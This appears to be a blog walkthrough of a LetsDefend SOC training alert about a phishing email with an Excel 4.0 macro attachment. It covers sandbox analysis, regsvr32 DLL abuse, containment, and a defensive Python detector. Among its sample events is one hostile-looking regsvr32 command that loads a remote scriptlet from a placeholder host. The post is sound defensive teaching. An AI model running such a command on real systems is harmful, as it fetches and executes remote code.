SOC146 – Phishing Mail Detected – Excel 4.0 Macros

A phishing email has been detected, and a summary of the alert is shown above. I will retrieve the ticket from the monitoring page and take ownership of it.

Investigating

To begin the investigation, I look at the source of the email. It was sent from the address “trenton@tritowncomputers.com,” and I have located the message that was delivered to Lars.

We can see the details of the email:
Source Address: “trenton@tritowncomputers.com”
Destination Address: lars@letsdefend.io
Subject: RE: Meeting Notes

Because the attachment may be malicious, it must not be opened on our host machine. Instead, we will analyze it inside REMnux, a Linux toolkit built for reverse-engineering and analyzing malware, where any code that runs stays inside a disposable VM.

REMnux

I have installed REMnux on our VMware Workstation hypervisor. Unzipping the attachment yields three files: “iroto1.dll,” “iroto.dll,” and “research-1646684671.xls”. Our next step is to analyze them for indicators of compromise (IOCs). Note that Excel 4.0 (XLM) macros are stored in macro sheets, not in the VBA project, so a scan that only extracts VBA can come back clean on a document that still carries executable macro code.

Virustotal

The VirusTotal analysis shows that the attachments are indeed malicious. Looking up the file hashes rather than uploading the samples avoids publishing a potentially sensitive attachment. I will review all of the VirusTotal data and take notes.

Playbook

After completing our initial investigation, we can proceed to begin our playbook.

The VirusTotal results make it evident that the attachment contained malicious content, so we label it as malicious.

Reviewing the ticket summary, the device action was “Allowed,” which means the email was not blocked and was successfully delivered to the user’s mailbox.

Let’s check Lars’s workstation for any sign that the attachment was opened.

I have located Lars’s device through our endpoint manager. Now we can review the terminal history and browser history from 06/13/2021.

Lars did open the attachment, and the resulting activity shows the malware using regsvr32.exe to load and register the dropped DLLs. regsvr32.exe calls the DLL’s exported DllRegisterServer function, which writes the DLL’s COM registration data into the Registry; as a side effect, any code the DLL author placed in that function runs. Because regsvr32.exe is a signed Microsoft binary, this is a common way to execute a malicious DLL under a legitimate-looking process. The VirusTotal results also confirm that the websites visited from the host are associated with this malware.
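The regsvr32.exe pattern above is easy to turn into a detection rule: regsvr32 spawned by an Office process, or pointed at a DLL under the user’s profile or at a relative path, is rarely legitimate. The following Python is an added example written for this post, not part of the original investigation or of any LetsDefend tooling. The process-creation events it scores are constructed samples in the shape of Sysmon Event ID 1 (parent image, image, command line); only the DLL names match the attachment analysed above. It also flags the broader regsvr32 abuse of loading a remote scriptlet through /i:, which goes beyond what this case shows.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 shape:
# parent image, image, command line). Illustrative only, not telemetry from
# the case; the DLL names are the ones found in the attachment.
SAMPLE_EVENTS = [
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe -s C:\Users\lars\AppData\Local\Temp\iroto.dll"),
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r"C:\Windows\SysWOW64\regsvr32.exe",
     r"regsvr32.exe /s ..\iroto1.dll"),
    (r"C:\Windows\System32\msiexec.exe",
     r"C:\Windows\System32\regsvr32.exe",
     r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = re.compile(r"\\(users|temp|appdata|downloads|programdata|public)\\", re.I)
ABSOLUTE = re.compile(r"^([a-z]:\\|\\\\)", re.I)
REMOTE_SCRIPTLET = re.compile(r"^[/-]i:(https?|ftp)://", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def split_cmdline(cmd):
    """Minimal Windows-style tokenizer: honours double quotes, keeps backslashes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def suspicious_dll_path(path):
    # A DLL registered from a user-writable folder is the pattern in this case:
    # the archive was extracted under the user's profile and regsvr32 pointed at it.
    if USER_WRITABLE.search(path):
        return True
    # A relative path with a separator is resolved against the current directory
    # of the spawning process, typically the folder the document was opened from.
    return "\\" in path and not ABSOLUTE.match(path)


def score_event(parent, image, cmdline):
    """Return the reasons this process-creation event looks like regsvr32 abuse."""
    if basename(image) != "regsvr32.exe":
        return []
    reasons = []
    if basename(parent) in OFFICE_PARENTS:
        reasons.append(f"regsvr32 spawned by Office process {basename(parent)}")
    for tok in split_cmdline(cmdline)[1:]:
        if tok.startswith(("/", "-")):
            if REMOTE_SCRIPTLET.match(tok):
                reasons.append(f"remote scriptlet loaded via {tok}")
        elif suspicious_dll_path(tok):
            reasons.append(f"DLL registered from user-writable or relative path: {tok}")
    return reasons


def triage(events):
    """Score every event; returns (image, reasons) pairs in input order."""
    return [(image, score_event(parent, image, cmd)) for parent, image, cmd in events]


if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS):
        print(("SUSPICIOUS" if reasons else "benign").ljust(10), image)
        for reason in reasons:
            print("           -", reason)
```

The first two events (Excel spawning regsvr32 against a DLL in the user’s Temp folder, and against a relative path) each produce two findings; the installer registering a DLL under Program Files produces none; the last event is flagged only for the remote /i: scriptlet. In a real deployment the same logic maps directly onto a SIEM query over process-creation events.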

Containment

We return to the endpoint manager and isolate the device from the rest of the network so that the malware cannot spread or reach its command-and-control infrastructure.

Now that we have contained the host, let’s finish the playbook.